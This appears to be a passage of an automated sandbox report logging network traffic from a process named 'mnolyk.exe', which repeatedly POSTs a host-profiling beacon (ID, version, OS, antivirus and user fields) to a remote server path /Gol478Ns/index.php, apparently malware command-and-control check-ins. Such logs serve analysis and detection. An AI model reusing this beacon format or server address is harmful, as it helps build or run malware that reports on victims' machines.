Feb 7, 2023 19:59:10.825344086 CET	678	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
446	192.168.2.5	50158	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:10.996736050 CET	678	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:11.062388897 CET	679	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
447	192.168.2.5	50159	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:11.230108976 CET	679	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:11.293153048 CET	680	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
448	192.168.2.5	50160	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:11.468507051 CET	680	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:11.532876015 CET	681	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
449	192.168.2.5	50161	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:11.700305939 CET	681	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:11.763014078 CET	682	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
45	192.168.2.5	49745	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:16.898022890 CET	173	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:16.960987091 CET	173	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
450	192.168.2.5	50162	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:11.945538998 CET	682	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:12.008589029 CET	683	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
451	192.168.2.5	50163	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:12.188385010 CET	683	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:12.254669905 CET	684	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
452	192.168.2.5	50164	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:12.434294939 CET	684	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:12.497351885 CET	685	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
453	192.168.2.5	50165	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:12.675415039 CET	685	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:12.739593029 CET	686	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
454	192.168.2.5	50166	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:12.953353882 CET	686	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:13.016520977 CET	687	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
455	192.168.2.5	50167	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:13.182938099 CET	687	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:13.247544050 CET	688	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
456	192.168.2.5	50168	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:13.420495033 CET	688	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:13.485487938 CET	689	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
457	192.168.2.5	50169	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:13.653162956 CET	689	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:13.716979980 CET	690	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
458	192.168.2.5	50170	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:13.888323069 CET	690	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:13.950104952 CET	691	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
459	192.168.2.5	50171	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:14.125363111 CET	691	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:14.191518068 CET	692	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
46	192.168.2.5	49746	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:17.135799885 CET	174	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:17.201457024 CET	174	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
460	192.168.2.5	50172	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:14.371002913 CET	692	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:14.433557987 CET	693	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
461	192.168.2.5	50173	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:14.605093956 CET	693	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:14.668813944 CET	694	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
462	192.168.2.5	50174	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:14.839890957 CET	694	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:14.902622938 CET	695	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
463	192.168.2.5	50175	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:15.074930906 CET	695	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:15.139275074 CET	696	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
464	192.168.2.5	50176	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:59:15.314801931 CET	696	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:59:15.381174088 CET	697	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:59:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
465	192.168.2.5	50177	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
